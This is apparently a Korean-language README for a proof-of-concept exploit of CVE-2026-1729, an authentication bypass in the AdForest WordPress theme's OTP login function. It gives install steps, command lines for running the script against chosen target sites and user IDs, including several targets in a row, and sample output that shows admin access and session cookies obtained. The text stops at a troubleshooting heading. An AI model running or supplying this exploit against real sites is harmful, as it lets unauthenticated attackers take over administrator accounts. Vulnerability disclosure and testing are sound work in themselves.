
AdForest WordPress 테마는 6.0.12를 포함한 모든 버전에서 인증 우회 취약점에 노출되어 있습니다. 이는 플러그인이 'sb_login_user_with_otp_fun' 함수를 통해 사용자를 인증하기 전에 사용자의 신원을 제대로 확인하지 않기 때문입니다. 이로 인해 인증되지 않은 공격자가 관리자를 포함하여 로그인할 수 있게 됩니다.
CVE-2026-1729에 대한 간단한 개념 증명(PoC) - AdForest WordPress 테마의 인증 우회 취약점. 작성자: f3ds cr3w est 2oo2 blog
requests 라이브러리pip install requests
python poc/exploit.py https://target-site.com
python poc/exploit.py https://target-site.com --user-id 2
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com
# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5
# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin
🎯 Exploit completed successfully!
You now have admin access to the WordPress site.
/wp-admin/에 대한 전체 관리자 접근 권한을 얻습니다.익스플로잇이 실패하는 경우: